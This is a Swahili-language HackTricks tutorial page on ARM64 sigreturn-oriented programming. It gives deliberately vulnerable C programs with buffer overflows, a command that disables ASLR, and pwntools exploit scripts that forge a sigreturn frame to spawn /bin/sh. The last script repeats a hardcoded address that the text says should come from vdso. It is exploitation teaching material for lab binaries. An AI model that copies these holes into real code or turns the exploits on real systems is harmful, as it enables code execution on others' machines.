Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks) ! Njia nyingine za kusaidia HackTricks:
Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI !
Mfano wa Pwntools
Mfano huu unajenga binary inayoweza kudhuriwa na kuitumia. Binary hiyo inasoma kwenye stack na kisha inaita sigreturn
:
Copy from pwn import *
binsh = "/bin/sh"
context . clear ()
context . arch = "arm64"
asm = ''
asm += 'sub sp, sp, 0x1000\n'
asm += shellcraft . read (constants.STDIN_FILENO, 'sp' , 1024 ) #Read into the stack
asm += shellcraft . sigreturn () # Call sigreturn
asm += 'syscall: \n' #Easy symbol to use in the exploit
asm += shellcraft . syscall ()
asm += 'binsh: .asciz " %s "' % binsh #To have the "/bin/sh" string in memory
binary = ELF . from_assembly (asm)
frame = SigreturnFrame ()
frame . x8 = constants . SYS_execve
frame . x0 = binary . symbols [ 'binsh' ]
frame . x1 = 0x 00
frame . x2 = 0x 00
frame . pc = binary . symbols [ 'syscall' ]
p = process (binary.path)
p . send ( bytes (frame))
p . interactive ()
mfano wa bof
Msimbo
Copy #include <stdio.h>
#include <string.h>
#include <unistd.h>
void do_stuff ( int do_arg){
if (do_arg == 1 )
__asm__ ( " mov x8, 0x8b; svc 0; " ) ;
return ;
}
char* vulnerable_function () {
char buffer[ 64 ];
read(STDIN_FILENO , buffer , 0x 1000 ) ; // <-- bof vulnerability
return buffer;
}
char* gen_stack () {
char use_stack[ 0x 2000 ];
strcpy(use_stack , "Hello, world!" ) ;
char* b = vulnerable_function() ;
return use_stack;
}
int main ( int argc , char ** argv) {
char* b = gen_stack() ;
do_stuff( 2 ) ;
return 0 ;
}
Sakinisha na:
Copy clang -o srop srop.c -fno-stack-protector
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR
Shambulizi
Shambulizi linatumia bof kurejea kwenye wito wa sigreturn
na kuandaa stack ili kuita execve
na kipokezi cha /bin/sh
.
Copy from pwn import *
p = process ( './srop' )
elf = context . binary = ELF ( './srop' )
libc = ELF ( "/usr/lib/aarch64-linux-gnu/libc.so.6" )
libc . address = 0x 0000fffff7df0000 # ASLR disabled
binsh = next (libc. search ( b "/bin/sh" ))
stack_offset = 72
sigreturn = 0x 00000000004006e0 # Call to sig
svc_call = 0x 00000000004006e4 # svc #0x0
frame = SigreturnFrame ()
frame . x8 = 0x dd # syscall number for execve
frame . x0 = binsh
frame . x1 = 0x 00 # NULL
frame . x2 = 0x 00 # NULL
frame . pc = svc_call
payload = b 'A' * stack_offset
payload += p64 (sigreturn)
payload += bytes (frame)
p . sendline (payload)
p . interactive ()
mfano wa bof bila sigreturn
Msimbo
Copy #include <stdio.h>
#include <string.h>
#include <unistd.h>
char* vulnerable_function () {
char buffer[ 64 ];
read(STDIN_FILENO , buffer , 0x 1000 ) ; // <-- bof vulnerability
return buffer;
}
char* gen_stack () {
char use_stack[ 0x 2000 ];
strcpy(use_stack , "Hello, world!" ) ;
char* b = vulnerable_function() ;
return use_stack;
}
int main ( int argc , char ** argv) {
char* b = gen_stack() ;
return 0 ;
}
Kudukua
Katika sehemu ya vdso
inawezekana kupata wito wa sigreturn
katika offset 0x7b0
:
Kwa hivyo, ikiwa itafichuliwa, inawezekana kutumia anwani hii kufikia sigreturn
ikiwa binary haipakii hiyo:
Copy from pwn import *
p = process ( './srop' )
elf = context . binary = ELF ( './srop' )
libc = ELF ( "/usr/lib/aarch64-linux-gnu/libc.so.6" )
libc . address = 0x 0000fffff7df0000 # ASLR disabled
binsh = next (libc. search ( b "/bin/sh" ))
stack_offset = 72
sigreturn = 0x 00000000004006e0 # Call to sig
svc_call = 0x 00000000004006e4 # svc #0x0
frame = SigreturnFrame ()
frame . x8 = 0x dd # syscall number for execve
frame . x0 = binsh
frame . x1 = 0x 00 # NULL
frame . x2 = 0x 00 # NULL
frame . pc = svc_call
payload = b 'A' * stack_offset
payload += p64 (sigreturn)
payload += bytes (frame)
p . sendline (payload)
p . interactive ()
Kwa habari zaidi kuhusu vdso angalia:
page Ret2vDSO Na ili kuepuka anwani ya /bin/sh
unaweza kuunda mazingira kadhaa yanayoelekeza kwake, kwa habari zaidi:
page ASLR Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert) ! Njia nyingine za kusaidia HackTricks:
Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA !
Last updated 23 hours ago